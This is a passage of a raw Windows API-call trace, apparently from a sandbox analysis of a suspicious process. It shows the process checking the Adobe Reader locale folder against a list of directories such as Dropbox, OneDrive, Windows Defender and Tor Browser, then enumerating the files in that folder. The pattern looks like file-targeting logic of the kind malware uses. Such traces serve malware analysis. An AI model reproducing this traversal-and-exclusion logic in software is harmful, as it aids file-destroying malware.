10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.515] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.515] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.516] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.516] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.516] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.516] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.516] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.516] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.516] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.516] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.516] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.516] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.NOR", cAlternateFileName="ACCESS~1.NOR")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x61e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.NOR", cAlternateFileName="")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801d5ec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.NOR", cAlternateFileName="ADOBEC~1.NOR")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82db9460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x75c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.NOR", cAlternateFileName="")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8207ba00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.NOR", cAlternateFileName="BRDLAN~1.NOR")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.NOR", cAlternateFileName="")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.NOR", cAlternateFileName="")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.NOR", cAlternateFileName="")) returned 1 [0058.519] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da43100, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.NOR", cAlternateFileName="MAKEAC~1.NOR")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d749580, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.NOR", cAlternateFileName="MULTIM~1.NOR")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9f6e40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fc08920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x140400, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.NOR", cAlternateFileName="READOU~1.NOR")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da43100, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.NOR", cAlternateFileName="")) returned 1 [0058.520] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da8f3c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.NOR", cAlternateFileName="SAVEAS~1.NOR")) returned 1 [0058.521] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.NOR", cAlternateFileName="")) returned 1 [0058.521] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.NOR", cAlternateFileName="")) returned 1 [0058.521] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.521] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.521] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.521] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8b6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.522] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.522] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.522] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.524] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddd5200, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.NOR", cAlternateFileName="")) returned 1 [0058.524] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4be5c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.NOR", cAlternateFileName="")) returned 1 [0058.524] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.NOR", cAlternateFileName="")) returned 1 [0058.524] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, 